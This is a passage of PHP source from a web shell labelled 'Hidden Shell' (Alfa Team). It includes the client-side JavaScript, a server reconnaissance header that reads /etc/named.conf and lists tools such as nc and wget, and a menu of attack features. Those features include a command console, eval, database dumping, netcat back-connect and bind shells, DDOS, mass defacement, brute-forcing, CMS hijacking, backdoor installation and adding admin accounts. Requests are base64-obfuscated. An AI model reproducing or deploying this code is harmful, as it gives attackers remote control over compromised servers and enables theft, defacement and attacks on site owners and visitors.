- -webkit-box-shadow:rgba(0,119,0) 0 0 4px;
- -moz-box-shadow:rgba(0,119,0) 0 0 4px}
- ';
- echo ".foottable{width: 300px;
- font-weight: bold;
- ".(!is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;
- }':'}');
- echo '.main th{text-align:left;
- }
- .main a{color: #FFF;
- }
- .main tr:hover{background-color:#646464;
- }
- .ml1{ border:1px solid #0E304A;
- padding:5px;
- margin:0;
- overflow: auto;
- }
- .bigarea{ width:99%;
- height:300px;
- }
- </style>
- ';
- echo "<script type='text/javascript'>
- var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
- var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
- var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
- var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';
- var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';
- var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';
- var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';
- var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';
- var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';
- var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';
- var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';
- var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';
- var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';
- var d = document;
- var mysql_cache = {};
- var upcount = 1;
- var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";
- function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {
- if(a!=null)d.mf.a.value=a;
- else d.mf.a.value=a_;
- if(c!=null)d.mf.c.value=c;
- else d.mf.c.value=c_;
- ";
- for($j=1;
- $j<=10;
- $j++){ echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';
- else d.mf.alfa'.$j.'.value=alfa'.$j.'_;
- ';
- } echo "
- if(charset!=null)d.mf.charset.value=charset;
- else d.mf.charset.value=charset_;
- }";
- echo 'function fc(a){alfaloader("block");
- var b="a=RmlsZXNNYW4=&c="+alfab64(a.c.value)+"&alfa1="+alfab64(a.alfa1.value)+"&ajax=dHJ1ZQ==&",c="";
- for(i=0;
- i<d.files.elements.length;
- i++)"checkbox"==d.files.elements[i].type&&d.files.elements[i].checked&&(c+="f[]="+alfab64(d.files.elements[i].value)+"&");
- _Ajax(d.URL,b+c,function(a){alfaloader("none")},!0)}function initDir(a){var b="",c="";
- islinux&&(b="<a onclick=\"g(\'FilesMan\',\'/\');
- \" href=\'javascript:void(0);
- \'>/</a>",c="/");
- var e=a.split("/"),f="",g="";
- "-1"!=e.indexOf("..")&&(e.splice(e.indexOf("..")-1,1),e.splice(e.indexOf(".."),1));
- for(i in e)""!=e[i]&&(f+="<a onclick=\"g(\'FilesMan\',\'"+g+e[i]+"/\');
- \" href=\'javascript:void(0);
- \'>"+e[i]+"/</a>",g+=e[i]+"/");
- $("header_cwd").innerHTML=b+f+" ";
- var e=c+e.join("/");
- e=e.replace("//","/"),d.footer_form.c.value=e,$("footer_cwd").value=e,c_=e}function evalJS(html){var newElement=document.createElement("div");
- newElement.innerHTML=html;
- for(var scripts=newElement.getElementsByTagName("script"),i=0;
- i<scripts.length;
- ++i){var script=scripts[i];
- eval(script.innerHTML)}}function _Ajax(a,b,c,e){var f=!1;
- return window.XMLHttpRequest?f=new XMLHttpRequest:window.ActiveXObject&&(f=new ActiveXObject("Microsoft.XMLHTTP")),f?(f.onreadystatechange=function(){4==f.readyState&&200==f.status&&("function"!=typeof c?d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText:e?(d.getElementsByClassName("ajaxarea")[0].innerHTML=f.responseText,c(f.responseText)):c(f.responseText))},f.open("POST",a,!0),f.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),f.send(b),void 0):void alert("Error !")}function handleup(a,b){var c="__fnameup";
- 0!=b&&(c="__fnameup"+b),a.files[0].name&&($(c).innerHTML=a.files[0].name)}function u(a){alfaloader("block");
- var b=!1;
- if(a.a.value=alfab64(a.a.value),a.c.value=alfab64(a.c.value),a.alfa1.value=alfab64(a.alfa1.value),a.charset.value=alfab64(a.charset.value),window.XMLHttpRequest?b=new XMLHttpRequest:window.ActiveXObject&&(b=new ActiveXObject("Microsoft.XMLHTTP")),b){var c=$("up_bar");
- b.upload&&(c.style.display="block",b.upload.onprogress=function(a){var b=a.position||a.loaded,d=a.totalSize||a.total,e=Math.floor(b/d*1e3)/10+"%";
- c.style.width=e}),b.onload=function(e){for(200===b.status?(_Ajax(d.URL,"a=RmlsZXNNYW4=&c="+a.c.value+"&ajax=dHJ1ZQ=="),c.style.display="none",a.a.value=atob(a.a.value),a.c.value=atob(a.c.value),a.alfa1.value=atob(a.alfa1.value),a.charset.value=atob(a.charset.value)):alert("An error occurred!"),$("footerup").value="",$("__fnameup").innerHTML="";
- upcount;
- ){var f=$("pfooterup_"+upcount);
- f&&f.parentNode.removeChild(f),upcount--}0==upcount&&upcount++,alfaloader("none")},b.onerror=function(a){};
- var e=new FormData(a);
- b.open("POST",d.URL),b.send(e)}}function g(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset){set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset),"GetConfig"!=a&&"download"!=alfa2&&(d.getElementsByClassName("ajaxarea")[0].innerHTML=\'<center><br /><img id="alfaloader" src="'.__showicon('loader').'"></img><br /><br /></center>\'),islinux&&"/"!=d.mf.c.value.substr(0,1)&&(d.mf.c.value="/"+d.mf.c.value);
- for(var data="a="+alfab64(a)+"&c="+alfab64(d.mf.c.value)+"&",i=1;
- i<=10;
- i++)data+="alfa"+i+"="+alfab64(eval("d.mf.alfa"+i+".value"))+"&";
- if(data+="&ajax=dHJ1ZQ==","FilesTools"==a&&"download"==alfa2){var dl=$("dlForm");
- return dl.c.value=alfab64(d.mf.c.value),dl.file.value=alfab64(alfa1),void dl.submit()}"GetConfig"!=a?(_Ajax(d.URL,data),c!=c_&&c&&initDir(c)):(alfaloader("block"),_Ajax(d.URL,data,function(a){try{a=JSON.parse(a),a.host&&a.user&&a.dbname&&($("db_host")&&($("db_host").value=a.host),$("db_user")&&($("db_user").value=a.user),$("db_name")&&($("db_name").value=a.dbname),$("db_pw")&&($("db_pw").value=a.password),$("db_prefix")&&a.prefix&&($("db_prefix").value=a.prefix),$("cc_encryption_hash")&&a.cc_encryption_hash&&($("cc_encryption_hash").value=a.cc_encryption_hash))}catch(a){}alfaloader("none")}))}function alfab64(a){return window.btoa(unescape(encodeURIComponent(a)))}function alfaloader(a){$("a_loader").style.display=a}function execute(){var a=d.cf.cmd;
- if(""!=a.value){var b=d.cf.output;
- if("clear"==a.value||"cls"==a.value||"reset"==a.value)return b.value="",a.value="",!1;
- if(a.value.match(/color/i)){var c=a.value.split(" ");
- return""!=c[1]&&(b.style.color=c[1],a.value=""),!1}alfaloader("block"),b.value+="\\n> "+a.value+"\\n",_Ajax(d.URL,"a=Y29uc29sZQ==&cmd="+alfab64(a.value),function(a){d.cf.output.value+=a,d.cf.output.scrollTop=d.cf.output.scrollHeight,alfaloader("none")}),a.value=""}}function fsu(a){alfaloader("block");
- for(var b={},c=0;
- c<a.elements.length;
- c++)"submit"!=a.elements[c].type&&(b[a.elements[c].name]=a.elements[c].value);
- for(c in mysql_cache)mysql_cache[c]=alfab64(mysql_cache[c]);
- _Ajax(d.URL,"a=U3Fs&alfa1=dXBkYXRl&alfa2="+alfab64(JSON.stringify(b))+"&c="+alfab64(c_)+"&charset="+mysql_cache.charset+"&type="+mysql_cache.type+"&sql_host="+mysql_cache.host+"&sql_login="+mysql_cache.user+"&sql_pass="+mysql_cache.pass+"&sql_base="+mysql_cache.db+"&sql_count="+mysql_cache.count+"&ajax=dHJ1ZQ==",function(a){evalJS(a),alfaloader("none")},!0)}function fs(f,e){alfaloader("block");
- var alfa1="query",alfa2=f.query?alfab64(f.query.value):"",host=f.sql_host?f.sql_host.value:mysql_cache.host,user=f.sql_login?f.sql_login.value:mysql_cache.user,pass=f.sql_pass?f.sql_pass.value:mysql_cache.pass,db=f.sql_base?f.sql_base.value:mysql_cache.db,type=f.type?f.type.value:mysql_cache.type,charset=f.charset?f.charset.value:mysql_cache.charset,count="";
- switch(count=f.sql_count?f.sql_count.checked?"true":"":mysql_cache.count,f){case"0":alfa1="select",alfa2=alfab64(e);
- break;
- case"1":e=eval(e),alfa1="select",alfa2=alfab64(e[0])+"&alfa3="+alfab64(e[1]);
- break;
- case"2":e=eval(e),alfa1="edit",alfa2=alfab64(db)+"&alfa3="+alfab64(e.join(":"));
- break;
- case"3":alfa1="loadfile",alfa2=alfab64(e);
- break;
- case"4":case"5":alfa1=(f=="4"?"dumpfile":"droptbl");
- var obj={},id=$("dumpfile");
- for(obj.file=id?id.value:"dump.sql",obj.tbl=[],i=0;
- i<d.sf.elements["tbl[]"].length;
- ++i)d.sf.elements["tbl[]"][i].checked&&obj.tbl.push(d.sf.elements["tbl[]"][i].value);
- alfa2=alfab64(JSON.stringify(obj))}_Ajax(d.URL,"a=U3Fs&alfa1="+alfab64(alfa1)+"&alfa2="+alfa2+"&c="+alfab64(c_)+"&charset="+alfab64(charset)+"&type="+alfab64(type)+"&sql_host="+alfab64(host)+"&sql_login="+alfab64(user)+"&sql_pass="+alfab64(pass)+"&sql_base="+alfab64(db)+"&sql_count="+alfab64(count)+"&ajax=dHJ1ZQ==",function(a){evalJS(a),alfaloader("none")},!0)}function ctlbc(a){var b=$("bcStatus"),c=$("bcipAction");
- "bind"==a.value?(c.style.display="none",b.innerHTML="<small>Press ` <font color=\'red\'>>></font> ` button and run ` <font color=\'red\'>nc server_ip port</font> ` on your computer</small>"):(c.style.display="inline-block",b.innerHTML="<small>Run ` <font color=\'red\'>nc -l -v -p port</font> ` on your computer and press ` <font color=\'red\'>>></font> ` button</small>")}function is(){for(i=0;
- i<d.sf.elements["tbl[]"].length;
- ++i)d.sf.elements["tbl[]"][i].checked=!d.sf.elements["tbl[]"][i].checked}function $(a){return d.getElementById(a)}function addnewup(){var a="footerup_"+upcount,b="pfooterup_"+upcount,c=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",e=d.createElement("p");
- e.innerHTML=\'<label class="inputfile" for="\'+a+\'"><span id="__fnameup\'+upcount+\'"></span> <strong>
-
- Choose a file</strong></label><input id="\'+a+\'" type="file" name="f[]" onChange="handleup(this,\'+upcount+\');
- ">\',e.id=b,e.appendAfter($(c)),upcount++}function alfa_searcher_tool(a){switch(a){case"all":case"dirs":_alfaSet(!0,"Disabled");
- break;
- case"files":_alfaSet(!1,"php")}}function _alfaSet(a,b){d.srch.ext.disabled=a,d.srch.ext.value=b}function dis_input(a){switch(a){case"phpmyadmin":bruteSet(!0,"Disabled","http://");
- break;
- case"direct":bruteSet(!1,"2222","http://");
- break;
- case"cp":bruteSet(!1,"2082","http://");
- break;
- case"ftp":bruteSet(!0,"Disabled","ftp://");
- break;
- case"mysql":bruteSet(!1,"3306","http://");
- break;
- case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(a,b,d){"21"!=b?c="localhost":c="ftp.example.com",$("port").disabled=a,$("port").value=b,$("target").value=c,$("protocol").value=d}Element.prototype.appendAfter=function(a){a.parentNode.insertBefore(this,a.nextSibling)};
- function inBackdoor(t){if(t.value=="my"){$("backdoor_textarea").style.display="block";
- }else{$("backdoor_textarea").style.display="none";
- }}';
- echo "</script>
- <form style='display:none;
- ' id='dlForm' action='' target='_blank' method='post'>
- <input type='hidden' name='a' value='ZGxmaWxl'>
- <input type='hidden' name='c' value=''>
- <input type='hidden' name='file' value=''>
- </form>
- <img id='a_loader' src='".__showicon('loader')."'>";
- $uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : '( php_uname ) Function Disabled !';
- echo '
- </head>
- <body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
- <div id="up_bar"></div>
- <div class="whole">
- <form method="post" name="mf" style="display:none;
- ">
- <input type="hidden" name="a">
- <input type="hidden" name="c">';
- for($s=1;
- $s<=10;
- $s++){ echo '<input type="hidden" name="alfa'.$s.'">';
- } echo '<input type="hidden" name="charset">
- </form>
- <div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible">Hidden Shell<br><small>Version: 2.5</small></a></div>
- <div class="header"><table width="100%" border="0">
- <tr>
- <td width="3%"><span><font color=#27979B>Uname:</font></span></td>
- <td colspan="2"><b>'.$uname.'</b></td>
- </tr>
- <tr>
- <td><span><font color=#27979B>User:</font></span></td>
- <td><b>'. $uid . ' [ ' . $user . ' ] </b><span> <font color=#27979B> Group: </font></span><b>' . $gid . ' [ ' . $group . ' ]</b> </td>
- <td width="12%" rowspan="8"><img style="border-radius:100px;
- " width="300" height="170" alt="" src="http://solevisible.com/images/alfa-iran.png" /></td>
- </tr>
- <tr>
- <td><span><font color=#27979B>PHP:</font></span></td>
- <td><b>'.@phpversion(). ' </b><span> <font color=#27979B> Safe Mode: </font>'.$safe_modes.'</span></td>
- </tr>
- <tr>
- <td><span><font color=#27979B>ServerIP:</font></span></td>
- <td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).' <span><font color=#27979B>Your IP:</font></span><b> '.@$_SERVER["REMOTE_ADDR"].'</b></td>
- </tr>
- <tr>
- <td width="3%"><span><font color=#27979B>DateTime:</font></span></td>
- <td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
- </tr>
- <tr>
- <td><span><font color=#27979B>Domains:</font></span></td>
- <td width="76%"><b>';
- if($GLOBALS['sys']=='unix'){ $d0mains = @file("/etc/named.conf");
- if(!$d0mains){echo "CANT READ named.conf";
- }else{ $count;
- foreach($d0mains as $d0main){ if(@ereg("zone",$d0main)){ preg_match_all('#zone "(.*)"#', $d0main, $domains);
- flush();
- if(strlen(trim($domains[1][0])) > 2){ flush();
- $count++;
- } } } echo "$count Domains";
- } } else{ echo"CANT READ |Windows|";
- } echo '</b></td>
- </tr>
- <tr>
- <td height="16"><span><font color=#27979B>HDD:<font></span></td>
- <td><span><font color=#27979B>Total:</font></span><b>'.alfaSize($totalSpace).' </b><span><font color=#27979B>Free:</font></span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
- </tr>';
- if($GLOBALS['sys']=='unix' ) { if(!@ini_get('safe_mode')) { if(strlen(alfaEx("id"))>0){ echo '<tr><td height="18" colspan="2"><span><font color=#27979B>Useful : </font></span><b>';
- $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
- foreach($userful as $item) if(alfaWhich($item)) echo $item.',';
- echo '</b></td>
- </tr>
- <tr>
- <td height="0" colspan="2"><span><font color=#27979B>Downloader:</font></span>';
- $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
- foreach($downloaders as $item2) if(alfaWhich($item2)) echo '<b>'.$item2.',';
- echo '</b></td>
- </tr>';
- }else{ echo '<tr><td height="18" colspan="2"><span><font color=#27979B>useful:<font></span>';
- echo '--------------</td>
- </tr><td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span>-------------</td>
- </tr>';
- } } else { echo '<tr><td height="18" colspan="2"><span><font color=#27979B>useful:<font></span>';
- echo '--------------</td>
- </tr><td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span>-------------</td>
- </tr>';
- } } else { echo '<tr><td height="18" colspan="2"><span><font color=#27979B>Windows:</font></span><b>';
- echo alfaEx('ver');
- echo '</td>
- </tr> <tr>
- <td height="0" colspan="2"><span><font color=#27979B>Downloader:</font> </span><b>-------------</b></td>
- </tr></b>';
- } $quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');
- if ($quotes == "1" or $quotes == "on"){$magic = '<b><font color="#0F0">ON</font>';
- }else{$magic = '<b><font color="red">OFF</font>';
- } echo '<tr>
- <td height="16" colspan="2"><span><font color=#27979B>Disabled Functions: </font></span><b>'.Alfa_GetDisable_Function().'</b></td>
- </tr>
- <tr>
- <td height="16" colspan="2"><span><font color=#27979B>CURL :</font><b>'.$curl.' </b> | <font color=#27979B>SSH2 : </font><b>'.$ssh2.' </b> | <font color=#27979B>Magic Quotes : </font><b>'.$magic.' </b> | <font color=#27979B> MySQL :</font><b>'.$mysql.' </b> | <font color=#27979B>MSSQL :</font><b>'.$mssql.' </b> | <font color=#27979B> PostgreSQL :</font><b>'.$pg.'</b> | <font color=#27979B> Oracle :</font> </span><b>'.$or.'</b></td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
- </tr>
- <tr>
- <td height="11" colspan="3"><span><font color=#27979B>Open_basedir :<b>'.$open_b.'</b></font> | <font color=#27979B>Safe_mode_exec_dir :</b>'.$safe_exe.'</b></font> | <font color=#27979B> Safe_mode_include_dir :</b>'.$safe_include.'</b></font></td>
- </tr>
- <tr>
- <td height="11"><span><font color=#27979B>SoftWare:<font color=#27979B> </span></td>
- <td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
- </tr>';
- if($GLOBALS[sys]=="win") { echo '<tr>
- <td height="12"><span><font color=#27979B>DRIVE:</font></span></td>
- <td colspan="2"><b>'.$drives.'</b></td>
- </tr>';
- } echo '<tr>
- <td height="12"><span><font color=#27979B>PWD:</font></span></td>
- <td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="javascript:void(0);
- " onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >| Home Shell |</font></a></td>
- </tr>
- </table>
- </div>
- <div id="meunlist">
- <ul>
- ';
- $li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Mysql Dumper','hash'=>'En-Decoder','connect'=>'BC','ssh2'=>'SSH2', 'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','cmd'=>'CONSOLE','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools', 'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors', 'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher', 'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<font color="#27E8AE">Alfa +</font>','selfrm'=>'Remove Shell' );
- foreach($li as $key=>$value){ echo('<li><a href="javascript:void(0);
- " onclick="g(\''.$key.'\',null,\'\',\'\',\'\');
- "><font color="#27979B">'.$value.'</font></a></li>'."\n");
- } if(!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass'])) echo '<li><a href="javascript:void(0);
- " onclick="g(\'logout\',null,\'\',\'\',\'\');
- location.reload();
- "><font color="red">LogOut</font></a></li></ul></div>';
- else echo '</ul></div>';
- }else{ @error_reporting(E_ALL ^ E_NOTICE);
- @session_start();
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @ini_set('magic_quotes_runtime', 0);
- @set_time_limit(0);
- }} function alfalogout(){ unset($_SESSION['AlfaUser'],$_SESSION['AlfaPass']);
- @header('location: '.$_SERVER['PHP_SELF']);
- } function __showicon($r){ $s['btn']='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